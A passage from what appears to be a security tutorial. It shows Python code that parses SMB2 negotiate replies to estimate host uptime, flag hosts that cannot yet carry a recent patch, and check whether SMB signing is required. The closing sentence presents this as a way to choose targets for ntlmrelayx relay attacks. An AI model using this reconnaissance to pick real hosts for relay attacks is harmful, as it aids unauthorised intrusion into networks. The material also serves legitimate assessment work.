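    """True when the host has not rebooted since patch_release, so a reboot-requiring update
    from that date cannot be in effect. The converse does not hold: a host that did reboot
    may still be unpatched, uptime only ever proves the negative."""
    return info["boot_time"] < patch_release


def relayable(info: dict) -> bool:
    """SMB relay only succeeds against servers that do not require signing."""
    return not info["signing_required"]


def demo(security_mode: int = SMB2_NEGOTIATE_SIGNING_ENABLED) -> dict:
    # Constructed timestamps, not from a real capture.
    system_time = datetime(2018, 1, 20, 12, 0, tzinfo=timezone.utc)
    boot_time = datetime(2017, 12, 1, 0, 0, tzinfo=timezone.utc)
    return parse_negotiate_response(
        build_negotiate_response(0x0210, security_mode, system_time, boot_time))


if __name__ == "__main__":
    info = demo()
    print(f"dialect 0x{info['dialect']:04x}, signing required: {info['signing_required']}, "
          f"up {info['uptime']} since {info['boot_time']:%Y-%m-%d %H:%M} UTC")
```

Against a real host you would send an SMB2 NEGOTIATE request and hand the reply bytes (after the 4-byte NetBIOS session header) to parse_negotiate_response(); the verdict from relayable() is what decides which targets an ntlmrelayx run is worth pointing at.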